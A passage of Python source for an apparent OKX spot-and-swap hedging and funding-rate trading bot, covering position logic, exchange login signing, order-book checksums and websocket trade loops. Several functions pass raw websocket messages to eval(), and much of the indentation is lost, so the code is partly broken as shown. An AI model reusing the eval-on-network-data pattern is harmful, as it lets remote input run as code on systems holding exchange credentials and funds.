        Sc=((spot_index_price-swap_present_price-Cm_swap-Cm_spot)+(spot_index_price-swap_present_price-Cm_swap-Cm_spot)) /2  # Sc is positive
elif swap_present_price == spot_index_price:
So=0
Sc=0
return So, Sc
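# Illustrative worked example (assumption, not from the original module): with
# swap_present_price = 101, spot_index_price = 100 and both maker commissions at
# 0.0005, Cm_swap = Cm_spot = 0.0505, so make_So_Sc() returns
# So = 101 - 100 - 0.101 = 0.899 (a positive opening spread) and Sc = -1.101,
# which is unused in that branch. Note that "(x + x) / 2" in the formula is just x.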
def open_long_judge(mode_open_long_judge, *args, **kwargs):
Target_Amount = mode_open_long_judge['Target_Amount']
spot_balance = mode_open_long_judge['spot_balance']
swap_position = mode_open_long_judge['swap_position']
swap_size = mode_open_long_judge['swap_size']
spot_size = mode_open_long_judge['spot_size']
contract_val = mode_open_long_judge['contract_value']
    # spot_balance > 0; swap_position is short and therefore < 0
open_long_mode = 'off'
open_long_final_open_mode = 'off'
open_long_final_close_mode = 'off'
    if Target_Amount - spot_balance > 0 and abs(Target_Amount - spot_balance) > float(spot_size):  # still more than one spot_size below the target, keep building
        open_long_mode = 'on'
    elif Target_Amount - spot_balance > 0 and abs(Target_Amount - spot_balance) < float(spot_size):  # spot is within one spot_size of Target_Amount; leave spot alone and look at swap
        if spot_balance + swap_position * contract_val > float(swap_size) * contract_val:  # posSide is net, so the position carries its own sign
            open_long_final_open_mode = 'on'  # the swap leg needs to grow: open more short
        elif -1*swap_position * contract_val - spot_balance > float(swap_size) * contract_val:
            open_long_final_close_mode = 'on'  # the swap leg is too big: close part of the short
return open_long_mode, open_long_final_open_mode, open_long_final_close_mode
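# Illustrative worked example (assumption, not from the original module): with
# Target_Amount = 10 coins, spot_balance = 4 and spot_size = 1, the first branch
# fires (6 > 1) and open_long_judge() returns ('on', 'off', 'off'), i.e. keep
# buying spot and shorting swap. Once spot_balance is within one spot_size of the
# target, the elif branch only adjusts the swap leg: it opens more short if the
# hedge is smaller than spot, or closes some if it is larger.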
def open_short_judge(mode_open_short_judge, *args, **kwargs):
    Target_Amount = mode_open_short_judge['Target_Amount']*-1  # opening a short (negative) position, hence * -1
spot_balance = mode_open_short_judge['spot_balance']
swap_position = mode_open_short_judge['swap_position']
swap_size = mode_open_short_judge['swap_size']
spot_size = mode_open_short_judge['spot_size']
contract_val=mode_open_short_judge['contract_value']
open_short_mode = 'off'
open_short_final_open_mode = 'off'
open_short_final_close_mode = 'off'
    # here Target_Amount is < 0, spot_balance < 0, and swap_position is long, i.e. > 0
    if Target_Amount - spot_balance < 0 and abs(Target_Amount - spot_balance) > float(spot_size):  # still more than one spot_size away from the target, keep building
        open_short_mode = 'on'
    elif Target_Amount - spot_balance < 0 and abs(Target_Amount - spot_balance) < float(spot_size):  # spot is within one spot_size of Target_Amount; leave spot alone and look at swap
        # the swap leg is smaller than spot, so add to it: open a long
        if spot_balance + swap_position * contract_val <0 and abs(spot_balance + swap_position * contract_val) > float(swap_size) * contract_val:
            open_short_final_open_mode = 'on'
        # the swap leg is larger than spot, so reduce it: close part of the long
        elif spot_balance + swap_position * contract_val >0 and abs(swap_position * contract_val + spot_balance) > float(swap_size) * contract_val:
open_short_final_close_mode = 'on'
return open_short_mode, open_short_final_open_mode, open_short_final_close_mode
def close_long_judge(mode_close_long_judge, *args, **kwargs):
Target_Amount_Close = mode_close_long_judge['Target_Amount_Close']
spot_balance = mode_close_long_judge['spot_balance']
swap_position = mode_close_long_judge['swap_position']
swap_close_size = mode_close_long_judge['swap_close_size']
spot_close_size = mode_close_long_judge['spot_close_size']
Predict_Funding_Rate = mode_close_long_judge['predict_funding']
Present_Funding_Rate = mode_close_long_judge['present_funding']
So_Sc_mode = mode_close_long_judge['So_Sc_mode']
contract_val= mode_close_long_judge['contract_value']
close_long_mode = 'off'
close_long_final_open_mode = 'off'
close_long_final_close_mode = 'off'
    # here Target_Amount_Close = 0 and the swap position is short, i.e. < 0
    if spot_balance - Target_Amount_Close > 0 and abs(spot_balance - Target_Amount_Close) > float(spot_close_size):  # spot exceeds the close target, so close
        # if So_Sc_mode == 'on':  # once So_Sc_mode is used, also factor in the funding rate
        # if Predict_Funding_Rate * Present_Funding_Rate >0:
        # close_long_mode = 'on'
        # else:
        # close_long_mode = 'off'
        # elif So_Sc_mode =='off':  # may be a large position gap or a big rally that needs rebalancing
        close_long_mode = 'on'
    elif spot_balance - Target_Amount_Close > 0 and abs(spot_balance - Target_Amount_Close) < float(spot_close_size):
        if -1*swap_position * contract_val - spot_balance > float(swap_close_size) * contract_val:  # swap exceeds spot: close part of the short
            close_long_final_close_mode = 'on'
        elif spot_balance + swap_position * contract_val > float(swap_close_size) * contract_val:  # swap is smaller than spot: open more short
close_long_final_open_mode = 'on'
return close_long_mode, close_long_final_open_mode, close_long_final_close_mode
def close_short_judge(mode_close_short_judge, *args, **kwargs):
Target_Amount_Close = mode_close_short_judge['Target_Amount_Close']
spot_balance = mode_close_short_judge['spot_balance']
swap_position = mode_close_short_judge['swap_position']
swap_close_size = mode_close_short_judge['swap_close_size']
spot_close_size = mode_close_short_judge['spot_close_size']
Predict_Funding_Rate = mode_close_short_judge['predict_funding']
Present_Funding_Rate = mode_close_short_judge['present_funding']
So_Sc_mode = mode_close_short_judge['So_Sc_mode']
contract_val = mode_close_short_judge['contract_value']
close_short_mode = 'off'
close_short_final_open_mode = 'off'
close_short_final_close_mode = 'off'
    # here spot_balance < 0 and Target_Amount_Close = 0
    if spot_balance - Target_Amount_Close < 0 and abs(spot_balance - Target_Amount_Close) > float(spot_close_size):  # spot exceeds the close target, so close
        # if So_Sc_mode == 'on':  # once So_Sc_mode is used, also factor in the funding rate
        # if Predict_Funding_Rate * Present_Funding_Rate >0:
        # close_short_mode = 'on'
        # else:
        # close_short_mode = 'off'
        # elif So_Sc_mode =='off':  # may be a large position gap or a big rally that needs rebalancing
        close_short_mode = 'on'
    elif spot_balance - Target_Amount_Close < 0 and abs(spot_balance - Target_Amount_Close) < float(spot_close_size):
        # the swap leg is larger than spot
        if (swap_position * contract_val + spot_balance )>0 and abs(swap_position * contract_val + spot_balance) > float(swap_close_size) * contract_val:  # swap exceeds spot: close part of the long
            close_short_final_close_mode = 'on'
        # the spot leg is larger than swap
        elif (spot_balance + swap_position * contract_val)<0 and abs(spot_balance + swap_position * contract_val) > float(swap_close_size) * contract_val:  # swap is smaller than spot: open more long
close_short_final_open_mode = 'on'
return close_short_mode, close_short_final_open_mode, close_short_final_close_mode
def get_timestamp():
now = datetime.now()
t = now.isoformat("T", "milliseconds")
return t + "Z"
def precfloat(num,digi):
return int(round(float(num)*math.pow(10,digi)))/math.pow(10,digi)
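# Illustrative note (assumption, not from the original module): precfloat() rounds
# a value to a fixed number of decimal digits, e.g. precfloat(1.23456, 2) == 1.23
# and precfloat('0.1999', 3) == 0.2.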
def get_server_time():
url = "https://www.okex.com/api/v5/public/time"
response = requests.get(url)
if response.status_code == 200:
return response.json()['data'][0]['ts']
else:
return ""
def get_local_timestamp():
return int(time.time())
def login_params(timestamp, api_key, passphrase, secret_key):
message = timestamp + 'GET' + '/users/self/verify'
mac = hmac.new(bytes(secret_key, encoding='utf8'), bytes(message, encoding='utf-8'), digestmod='sha256')
d = mac.digest()
sign = base64.b64encode(d)
login_param = {"op": "login", "args": [{"apiKey": api_key,
"passphrase": passphrase,
"timestamp": timestamp,
"sign": sign.decode("utf-8")}]}
login_str = json.dumps(login_param)
return login_str
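# Illustrative note (assumption, not from the original module): login_params() builds
# the OKX v5 websocket login frame. The signature is
# Base64(HMAC-SHA256(secret_key, timestamp + 'GET' + '/users/self/verify')), so for
# timestamp '1629350000' the string being signed is '1629350000GET/users/self/verify'.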
def partial(res):
data_obj = res['data'][0]
bids = data_obj['bids']
asks = data_obj['asks']
instrument_id = res['arg']['instId']
    # print('snapshot bids: ' + str(bids))
    # print('levels: ' + str(len(bids)))
    # print('snapshot asks: ' + str(asks))
    # print('levels: ' + str(len(asks)))
return bids, asks, instrument_id
def update_bids(res, bids_p):
    # incremental bids data
    bids_u = res['data'][0]['bids']
    # print('incremental bids: ' + str(bids_u))
    # print('levels: ' + str(len(bids_u)))
    # merge bids
for i in bids_u:
bid_price = i[0]
for j in bids_p:
if bid_price == j[0]:
if i[1] == '0':
bids_p.remove(j)
break
else:
del j[1]
j.insert(1, i[1])
break
else:
if i[1] != "0":
bids_p.append(i)
else:
bids_p.sort(key=lambda price: sort_num(price[0]), reverse=True)
        # print('merged bids: ' + str(bids_p) + ', levels: ' + str(len(bids_p)))
return bids_p
def update_asks(res, asks_p):
    # incremental asks data
    asks_u = res['data'][0]['asks']
    # print('incremental asks: ' + str(asks_u))
    # print('levels: ' + str(len(asks_u)))
    # merge asks
for i in asks_u:
ask_price = i[0]
for j in asks_p:
if ask_price == j[0]:
if i[1] == '0':
asks_p.remove(j)
break
else:
del j[1]
j.insert(1, i[1])
break
else:
if i[1] != "0":
asks_p.append(i)
else:
asks_p.sort(key=lambda price: sort_num(price[0]))
        # print('merged asks: ' + str(asks_p) + ', levels: ' + str(len(asks_p)))
return asks_p
def sort_num(n):
if n.isdigit():
return int(n)
else:
return float(n)
def check(bids, asks):
    # build the bid-level strings
bids_l = []
bid_l = []
count_bid = 1
while count_bid <= 25:
if count_bid > len(bids):
break
bids_l.append(bids[count_bid-1])
count_bid += 1
for j in bids_l:
str_bid = ':'.join(j[0 : 2])
bid_l.append(str_bid)
    # build the ask-level strings
asks_l = []
ask_l = []
count_ask = 1
while count_ask <= 25:
if count_ask > len(asks):
break
asks_l.append(asks[count_ask-1])
count_ask += 1
for k in asks_l:
str_ask = ':'.join(k[0 : 2])
ask_l.append(str_ask)
    # concatenate the checksum string
num = ''
if len(bid_l) == len(ask_l):
for m in range(len(bid_l)):
num += bid_l[m] + ':' + ask_l[m] + ':'
elif len(bid_l) > len(ask_l):
        # more bid levels than ask levels
for n in range(len(ask_l)):
num += bid_l[n] + ':' + ask_l[n] + ':'
for l in range(len(ask_l), len(bid_l)):
num += bid_l[l] + ':'
elif len(bid_l) < len(ask_l):
        # more ask levels than bid levels
for n in range(len(bid_l)):
num += bid_l[n] + ':' + ask_l[n] + ':'
for l in range(len(bid_l), len(ask_l)):
num += ask_l[l] + ':'
new_num = num[:-1]
int_checksum = zlib.crc32(new_num.encode())
fina = change(int_checksum)
return fina
def change(num_old):
num = pow(2, 31) - 1
if num_old > num:
out = num_old - num * 2 - 2
else:
out = num_old
return out
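# Illustrative sketch (assumption, not from the original module): check() joins up to
# 25 bid/ask levels as "bidPx:bidSz:askPx:askSz:...", CRC32s the string, and change()
# folds the unsigned CRC32 into the signed 32-bit value reported by OKX's books
# channel. For a hypothetical one-level book:
#
#     bids = [['3366.1', '7', '0', '3']]
#     asks = [['3366.8', '9', '10', '3']]
#     check(bids, asks)  # zlib.crc32(b'3366.1:7:3366.8:9') mapped to a signed int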
# subscribe to channels that do not require login
async def subscribe_without_login(url, channels,MQ,TradingPair):
l = []
while True:
try:
async with websockets.connect(url) as ws:
sub_param = {"op": "subscribe", "args": channels}
sub_str = json.dumps(sub_param)
await ws.send(sub_str)
# print(f"send: {sub_str}")
while True:
try:
res = await asyncio.wait_for(ws.recv(), timeout=25)
except (asyncio.TimeoutError, websockets.exceptions.ConnectionClosed) as e:
try:
await ws.send('ping')
res = await ws.recv()
#print(res)
continue
except Exception as e:
print("连接关闭,正在重连……")
break
# print(get_timestamp() + res)
res = eval(res)
if 'event' in res:
continue
#print('market_res',res)
if res['arg']['channel'] == 'books5':
instr = res["arg"]["instId"].split("-")
TP = instr[0] + "-" + instr[1]
if len(instr) == 2:
if MQ[TP]["DEPTH5_SPOT"].empty() == True:
MQ[TP]["DEPTH5_SPOT"].put(res["data"])
elif MQ[TP]["DEPTH5_SPOT"].empty() == False:
MQ[TP]["DEPTH5_SPOT"].get()
MQ[TP]["DEPTH5_SPOT"].put(res["data"])
elif len(instr) == 3:
if MQ[TP]["DEPTH5_SWAP"].empty() == True:
MQ[TP]["DEPTH5_SWAP"].put(res["data"])
elif MQ[TP]["DEPTH5_SWAP"].empty() == False:
MQ[TP]["DEPTH5_SWAP"].get()
MQ[TP]["DEPTH5_SWAP"].put(res["data"])
elif res['arg']['channel'] == 'index-tickers':
                        # spot index tickers
instr = res["arg"]["instId"].split("-")
TP = instr[0] + "-" + instr[1]
if len(instr) == 2:
if MQ[TP]["INDEX_TICKERS_SPOT"].empty() == True:
MQ[TP]["INDEX_TICKERS_SPOT"].put(res["data"])
elif MQ[TP]["INDEX_TICKERS_SPOT"].empty() == False:
MQ[TP]["INDEX_TICKERS_SPOT"].get()
MQ[TP]["INDEX_TICKERS_SPOT"].put(res["data"])
elif res['arg']['channel'] == 'mark-price':
instr = res["arg"]["instId"].split("-")
TP = instr[0] + "-" + instr[1]
if len(instr) == 3:
if MQ[TP]["MARK_PRICE_SWAP"].empty() == True:
MQ[TP]["MARK_PRICE_SWAP"].put(res["data"])
elif MQ[TP]["MARK_PRICE_SWAP"].empty() == False:
MQ[TP]["MARK_PRICE_SWAP"].get()
MQ[TP]["MARK_PRICE_SWAP"].put(res["data"])
                    elif res['arg']['channel'] == 'funding-rate':  # only swaps have a funding rate
instr = res["arg"]["instId"].split("-")
TP = instr[0] + "-" + instr[1]
if MQ[TP]["PREDICT_FUNDING"].empty() == True:
MQ[TP]["PREDICT_FUNDING"].put(res["data"])
elif MQ[TP]["PREDICT_FUNDING"].empty() == False:
MQ[TP]["PREDICT_FUNDING"].get()
MQ[TP]["PREDICT_FUNDING"].put(res["data"])
except Exception as e:
#print("disconneted,connecting MQ……")
# error存成csv
mapping = {}
kk = []
path = '/root/' + Customer_name + '_error_report.csv'
key_list = ['timestamp', 'error']
for key, value in zip(key_list, [datetime.now(), e]):
mapping[key] = value
kk.append(eval(json.dumps(mapping)))
kkk = pd.DataFrame(kk)
# kkk.to_csv(path, mode='a+', header=True, index=False)
continue
# subscribe to channels that require login
async def subscribe(url, api_key, passphrase, secret_key, channels,AQ, TradingPair):
while True:
try:
async with websockets.connect(url) as ws:
# login
timestamp = str(get_local_timestamp())
login_str = login_params(timestamp, api_key, passphrase, secret_key)
await ws.send(login_str)
#print(f"send: {login_str}")
res = await ws.recv()
# print(res)
# subscribe
sub_param = {"op": "subscribe", "args": channels}
sub_str = json.dumps(sub_param)
await ws.send(sub_str)
#print(f"send: {sub_str}")
while True:
try:
res = await asyncio.wait_for(ws.recv(), timeout=25)
except (asyncio.TimeoutError, websockets.exceptions.ConnectionClosed) as e:
try:
await ws.send('ping')
res = await ws.recv()
#print(res)
continue
except Exception as e:
print("连接关闭,正在重连AQ_login……")
break
#get account's info
res = eval(res)
if 'event' in res:
continue
                    if res['arg']['channel'] == 'account':  # spot balance query
res_spot_ccy_list=[]
                        for i in TradingPair:  # build res_spot_ccy_list from the trading pairs
TP=i.split('-')[0]
res_spot_ccy_list.append(TP)
                        stream_spot_list=[]  # build stream_spot_list from the websocket response
if len(res['data']) != 0:
for i in res['data'][0]['details']:
if i['ccy'] != 'USDT':
stream_spot_list.append(i['ccy'])
                        # find the pairs present in both TradingPair and the response
if len(stream_spot_list)!=0:
for j in res_spot_ccy_list:
if j in stream_spot_list:
for k in res['data'][0]['details']:
if k['ccy']==j:
TP=k['ccy']+'-USDT' #記得要是okex的格式
if AQ[TP]["POSITION_SPOT"].empty() == True:
AQ[TP]["POSITION_SPOT"].put(k)
elif AQ[TP]["POSITION_SPOT"].empty() == False:
AQ[TP]["POSITION_SPOT"].get()
AQ[TP]["POSITION_SPOT"].put(k)
else:
TP=j+'-USDT'
kk = {'availBal': '0', 'availEq': '0', 'cashBal': '0', 'ccy': j, 'crossLiab': '0', 'disEq': '0', 'eq': '0', 'frozenBal': '0',
'interest': '0', 'isoEq': '0', 'isoLiab': '0', 'liab': '0', 'mgnRatio': '0', 'ordFrozen': '0', 'twap': '0', 'uTime': '0', 'upl': '0'}
if AQ[TP]["POSITION_SPOT"].empty() == True:
AQ[TP]["POSITION_SPOT"].put(kk)
elif AQ[TP]["POSITION_SPOT"].empty() == False:
AQ[TP]["POSITION_SPOT"].get()
AQ[TP]["POSITION_SPOT"].put(kk)
#print('res_here',res)
if res['arg']['channel'] == 'positions':
if res['arg']['instType'] == 'SWAP':
res_swap_ccy_list=[]
                            for i in TradingPair:  # build res_swap_ccy_list from the trading pairs
res_swap_ccy_list.append(i)
                            stream_swap_list=[]  # build stream_swap_list from the websocket response
if len(res['data']) != 0:
for i in res['data']:
a=i['instId'].split('-SWAP')[0]
stream_swap_list.append(a)
                            if len(res_swap_ccy_list) !=0:  # the ws can send just [] right after opening a position, so iterate over res_swap_ccy_list instead
for j in res_swap_ccy_list:
if j in stream_swap_list:
for k in res['data']:
if k['instId']==j+'-SWAP':
TP=j
if AQ[TP]["POSITION_SWAP"].empty() == True:
AQ[TP]["POSITION_SWAP"].put(k)
elif AQ[TP]["POSITION_SWAP"].empty() == False:
AQ[TP]["POSITION_SWAP"].get()
AQ[TP]["POSITION_SWAP"].put(k)
else:
TP=j
kk = {'pos': '0', 'availPos': '0', 'cashBal': '0', 'instId': j + '-SWAP','instType': 'SWAP'}
if AQ[TP]["POSITION_SWAP"].empty() == True:
AQ[TP]["POSITION_SWAP"].put(kk)
elif AQ[TP]["POSITION_SWAP"].empty() == False:
AQ[TP]["POSITION_SWAP"].get()
AQ[TP]["POSITION_SWAP"].put(kk)
                        if res['arg']['instType'] == 'MARGIN':  # not needed in cross-currency margin mode; everything ends up in spot_balance
# print('margin_res',res)
res_margin_instId_list=[]
                            for i in TradingPair:  # build res_margin_instId_list from the trading pairs
TP=i.split('-')[0]
res_margin_instId_list.append(TP)
                            stream_margin_list=[]  # build stream_margin_list from the websocket response
if len(res['data']) != 0:
for i in res['data'][0]['details']:
if i['ccy'] != 'USDT':
stream_margin_list.append(i['ccy'])
                            # find the pairs present in both TradingPair and the response
if len(stream_margin_list) !=0:
for j in res_margin_instId_list:
if j in stream_margin_list:
for k in res['data'][0]['details']:
if k['ccy']==j:
TP=k['ccy']+'-USDT' #記得要是okex的格式
if AQ[TP]["POSITION_MARGIN"].empty() == True:
AQ[TP]["POSITION_MARGIN"].put(k)
elif AQ[TP]["POSITION_MARGIN"].empty() == False:
AQ[TP]["POSITION_MARGIN"].get()
AQ[TP]["POSITION_MARGIN"].put(k)
else:
TP=j+'-USDT'
kk = {'availBal': '0', 'availEq': '0', 'cashBal': '0', 'ccy': j, 'crossLiab': '0', 'disEq': '0', 'eq': '0', 'frozenBal': '0',
'interest': '0', 'isoEq': '0', 'isoLiab': '0', 'liab': '0', 'mgnRatio': '0', 'ordFrozen': '0', 'twap': '0', 'uTime': '0', 'upl': '0'}
if AQ[TP]["POSITION_MARGIN"].empty() == True:
AQ[TP]["POSITION_MARGIN"].put(kk)
elif AQ[TP]["POSITION_MARGIN"].empty() == False:
AQ[TP]["POSITION_MARGIN"].get()
AQ[TP]["POSITION_MARGIN"].put(kk)
if res['arg']['channel'] == 'orders':
                        # store unfilled spot orders
#print('orders_res', res)
for j in TradingPair:
if len(res['data']) !=0:
for k in res['data']:
instr_fu = k['instId'].split('-')
if res['data'][0]['instType'] == 'SPOT': #spot
if instr_fu[0] + "-" + instr_fu[1] == j:
TP = instr_fu[0] + "-" + instr_fu[1]
# if k['state'] != 'canceled' or k['state'] != 'filled':
if AQ[TP]["ORDERS_SPOT"].empty() == True:
AQ[TP]["ORDERS_SPOT"].put(k)
elif AQ[TP]["ORDERS_SPOT"].empty() == False:
AQ[TP]["ORDERS_SPOT"].get()
AQ[TP]["ORDERS_SPOT"].put(k)
if res['data'][0]['instType'] == 'SWAP': # swap
if instr_fu[0] + "-" + instr_fu[1] == j:
TP = instr_fu[0] + "-" + instr_fu[1]
if AQ[TP]["ORDERS_SWAP"].empty() == True:
AQ[TP]["ORDERS_SWAP"].put(k)
elif AQ[TP]["ORDERS_SWAP"].empty() == False:
AQ[TP]["ORDERS_SWAP"].get()
AQ[TP]["ORDERS_SWAP"].put(k)
except Exception as e:
print(e)
print("disconnected,connecting AQ……")
# error存成csv
mapping = {}
kk = []
path = '/root/' + Customer_name + '_error_report.csv'
key_list = ['timestamp', 'error']
for key, value in zip(key_list, [datetime.now(), e]):
mapping[key] = value
kk.append(eval(json.dumps(mapping)))
kkk = pd.DataFrame(kk)
# kkk.to_csv(path, mode='a+', header=True, index=False)
continue
# trade
async def trade(url, api_key, passphrase, secret_key, MQ,AQ,TradingPair,param_set_list):
while True:
try:
# print('started')
async with websockets.connect(url) as ws:
# login
timestamp = str(get_local_timestamp())
login_str = login_params(timestamp, api_key, passphrase, secret_key)
await ws.send(login_str)
#print(f"send: {login_str}")
res = await ws.recv()
#print('res_trade',res)
                # cancel all leftover open orders first; this uses the REST API for now
beginning_pending_order_result = tradeAPI.get_order_list()
order_id_list = []
if beginning_pending_order_result['data'] != 0:
for i in beginning_pending_order_result['data']:
uncomplete_orderId = i['ordId']
uncomplete_order_instId = i['instId']
key_list = []
value_list = []
key_list = ["instId", "ordId"]
value_list = [uncomplete_order_instId, uncomplete_orderId]
dictionary_uncomplete_order = dict(zip(key_list, value_list))
order_id_list.append(dictionary_uncomplete_order)
if len(order_id_list) != 0:
revoke_result = tradeAPI.cancel_multiple_orders(order_id_list)
time.sleep(0.1)
maker_commission_spot = param_set_list['maker_commission_spot']
taker_commission_spot = param_set_list['taker_commission_spot']
maker_commission_swap = param_set_list['maker_commission_swap']
taker_commission_swap = param_set_list['taker_commission_swap']
tolerate_limit = param_set_list['tolerate_limit']
                order_limit = param_set_list['order_limit']  # USD value of each opening order
                close_short_index = param_set_list['close_short_index']  # closing size as a multiple of the opening size
Nowtime = datetime.now()
print(Nowtime)
record_minute = Nowtime.minute
record_hour = Nowtime.hour
                # fetch the instrument parameters first
Necessary_info = {}
Operation_info = {}
print('TradingPair',TradingPair)
for i in TradingPair:
Necessary_info[i] = {}
Operation_info[i] = {}
for i in TradingPair:
Necessary_info[i]['swap_instrument_id']=i+'-SWAP'
Necessary_info[i]['spot_instrument_id']=i
Necessary_info[i]['Total_money'] = TradingPair[i]
swap_info = publicAPI.get_instruments('SWAP')['data']
time.sleep(0.1)
# print(swap_info)
for j in swap_info:
                        if j['instId'] == i + '-SWAP':  # note: this is the SWAP instId
Necessary_info[i]['swap_tick_size'] = float(j["tickSz"])
Necessary_info[i]['swap_tick_digit'] = np.log10(1 / float(j["tickSz"]))
Necessary_info[i]['contract_val'] = float(j['ctVal'])
Necessary_info[i]['swap_min_size'] = float(j['minSz'])
spot_info = publicAPI.get_instruments('SPOT')['data']
time.sleep(0.1)
for j in spot_info:
                        if j['instId'] == i:  # note: this is the SPOT instId
Necessary_info[i]['spot_tick_size'] = float(j["tickSz"])
Necessary_info[i]['spot_tick_digit'] = np.log10(1 / float(j["tickSz"]))
Necessary_info[i]['spot_min_size'] = float(j['minSz'])
# Funding_Rate
instId_fu, Necessary_info[i]['Present_Funding_Rate'],Necessary_info[i]['Predict_Funding_Rate'] = funding_recalculate(i + '-SWAP')
Operation_info[i]['spot_bids_price5']=[]
Operation_info[i]['spot_asks_price5']=[]
# try:
# spot_depth5 = MQ[i]["DEPTH5_SPOT"].get(timeout=1)
                    # print('spot_depth5 from the websocket ___2')
# except:
# spot_depth5 = marketAPI.get_orderbook(i , '5')['data']
                    # print('spot_depth5 fell back to the REST API ___2')
# time.sleep(0.1)
try:
Operation_info[i]['spot_depth5'] = MarketQ[i]["DEPTH5_SPOT"].get(timeout=1)
except:
try:
Operation_info[i]['spot_depth5'] = Operation_info[i]['spot_depth5']
except:
Operation_info[i]['spot_depth5'] = marketAPI.get_orderbook(i , '5')['data']
                            print('spot_depth5 fell back to the REST API __2')
time.sleep(0.1)
for j in range(5):
Operation_info[i]['spot_bids_price5'].append(float(Operation_info[i]['spot_depth5'][0]['bids'][j][0]))
Operation_info[i]['spot_asks_price5'].append(float(Operation_info[i]['spot_depth5'][0]['asks'][j][0]))
Operation_info[i]['swap_bids_price5'] = []
Operation_info[i]['swap_asks_price5'] = []
                    # testing
# swap_depth5 = MQ[h]["DEPTH5_SWAP"].get(timeout=1)
try:
Operation_info[i]['swap_depth5'] = MQ[i]["DEPTH5_SWAP"].get(timeout=1)
except:
try:
Operation_info[i]['swap_depth5']= Operation_info[i]['swap_depth5']
except:
Operation_info[i]['swap_depth5'] = marketAPI.get_orderbook(i + '-SWAP', '5')['data']
time.sleep(0.1)
                            print('swap_depth5 fell back to the REST API __2')
for j in range(5):
Operation_info[i]['swap_bids_price5'].append(float(Operation_info[i]['swap_depth5'][0]['bids'][j][0]))
Operation_info[i]['swap_asks_price5'].append(float(Operation_info[i]['swap_depth5'][0]['asks'][j][0]))
# Operation_info[i]['spot_swap_update_mode'] = 'off'
Operation_info[i]['swap_pending_list_left'] = 'off'
Operation_info[i]['spot_pending_list_left'] = 'off'
Operation_info[i]['swap_pending_order_result']=[]
Operation_info[i]['spot_pending_order_result']=[]
                    # hourly buy/sell fill counts
Operation_info[i]['spot_buy_trading_orders']=0
Operation_info[i]['spot_sell_trading_orders']=0
Operation_info[i]['swap_buy_trading_orders']=0
Operation_info[i]['swap_sell_trading_orders']=0
                    # hourly net traded value
Operation_info[i]['spot_buy_trading_net_amount']=0
Operation_info[i]['spot_sell_trading_net_amount']=0
Operation_info[i]['swap_buy_trading_net_amount']=0
Operation_info[i]['swap_sell_trading_net_amount']=0
Operation_info[i]['spot_trading_buy_size']=0
Operation_info[i]['spot_trading_sell_size']=0
Operation_info[i]['swap_trading_buy_size']=0
Operation_info[i]['swap_trading_sell_size']=0
Operation_info[i]['spot_trading_fee']=0
Operation_info[i]['swap_trading_fee']=0
                    # used when the position drifts to decide whether to close or open; start in the 'open' state
Operation_info[i]['position_direction']='open'
while True:
try:
#time.sleep(0.5)
for h in TradingPair:
                            # set the spot/swap sizes here first
open_long_mode = 'off'
open_short_mode = 'off'
close_long_mode = 'off'
close_short_mode = 'off'
open_long_final_open_mode = 'off'
open_short_final_open_mode = 'off'
open_long_final_close_mode = 'off'
open_short_final_close_mode = 'off'
close_long_final_open_mode = 'off'
close_short_final_open_mode = 'off'
close_long_final_close_mode = 'off'
close_short_final_close_mode = 'off'
So_Sc_mode = 'on'
                            no_pending_order = 'on'  # no leftover orders at the start
mode_take_long_order = {}
mode_take_short_order = {}
Nowtime = datetime.now()
                            # keep the bot idle from half an hour before funding until two hours after, i.e. for 12600 seconds
# Total_seconds=0
# if Nowtime.hour in [7,8,15,16,23,0]:
# if Nowtime.hour in [7,15,23] and Nowtime.minute<30:
# pass
# else:
# if Nowtime.hour in [7,8]:
# T_hour=8-Nowtime.hour
# T_minute=60-Nowtime.minute
# T_second=60-Nowtime.second
# elif Nowtime.hour in [15,16]:
# T_hour=16-Nowtime.hour
# T_minute=60-Nowtime.minute
# T_second=60-Nowtime.second
# elif Nowtime.hour in [23,0]:
# if Nowtime.hour == 23:
# t_hour=-1
# else:
# t_hour= Nowtime.hour
# T_hour=0-t_hour
# T_minute=60-Nowtime.minute
# T_second=60-Nowtime.second
# Total_seconds=T_hour*3600+T_minute*60+T_second
# print(Total_seconds)
# print('trade loop now for sleep')
# time.sleep(Total_seconds)
                            # refresh predict_funding_rate every minute
new_record_minute = Nowtime.minute
if new_record_minute != record_minute:
#print(new_record_minute)
try:
Swap_Funding_Rate = MQ[h]["PREDICT_FUNDING"].get(timeout=0.5)
Necessary_info[h]['Predict_Funding_Rate'] = float(Swap_Funding_Rate[0]['nextFundingRate'])
except:
pass
# Funding_Rate
record_minute = new_record_minute
                                time.sleep(0.3)  # avoid hammering the websocket queue
                            # refresh present_funding_rate every hour
new_record_hour = Nowtime.hour
if new_record_hour != record_hour:
try:
                                    instId_fu, Necessary_info[h]['Present_Funding_Rate'],Necessary_info[h]['Predict_Funding_Rate'] = funding_recalculate(h + '-SWAP')
except:
pass
                                time.sleep(0.3)  # avoid hammering the websocket queue
record_hour = new_record_hour
                            # swap mid price
Operation_info[h]['new_swap_bids_price5'] = []
Operation_info[h]['new_swap_asks_price5'] = []
try:
Operation_info[h]['new_swap_depth5'] = MQ[h]["DEPTH5_SWAP"].get(timeout=1)
except:
try:
Operation_info[h]['new_swap_depth5'] = Operation_info[h]['new_swap_depth5']
except:
Operation_info[h]['new_swap_depth5'] = marketAPI.get_orderbook(h + '-SWAP', '5')['data']
time.sleep(0.1)
for i in range(5):
Operation_info[h]['new_swap_bids_price5'].append(float(Operation_info[h]['new_swap_depth5'][0]['bids'][i][0]))
Operation_info[h]['new_swap_asks_price5'].append(float(Operation_info[h]['new_swap_depth5'][0]['asks'][i][0]))
new_swap_bid=float(Operation_info[h]['new_swap_bids_price5'][0])
new_swap_ask=float(Operation_info[h]['new_swap_asks_price5'][0])
                            swap_present_price = precfloat((new_swap_ask + new_swap_bid)/2,Necessary_info[h]['swap_tick_digit'])  # keep using the name swap_present_price here rather than new_swap_present_price
                            # new spot mid price
Operation_info[h]['new_spot_bids_price5'] = []
Operation_info[h]['new_spot_asks_price5'] = []
try:
Operation_info[h]['new_spot_depth5'] = MQ[h]["DEPTH5_SPOT"].get(timeout=0.5)
                                # print('spot_depth5 still from the websocket ___5')
except:
try:
Operation_info[h]['new_spot_depth5']=Operation_info[h]['new_spot_depth5']
except:
Operation_info[h]['new_spot_depth5']=marketAPI.get_orderbook(h, '5')['data']
time.sleep(0.1)
print('h_1',h)
print('我spot_depth5还是用restAPI___5')
for i in range(5):
Operation_info[h]['new_spot_bids_price5'].append(float(Operation_info[h]['new_spot_depth5'][0]['bids'][i][0]))
Operation_info[h]['new_spot_asks_price5'].append(float(Operation_info[h]['new_spot_depth5'][0]['asks'][i][0]))
new_spot_bid = float(Operation_info[h]['new_spot_bids_price5'][0])
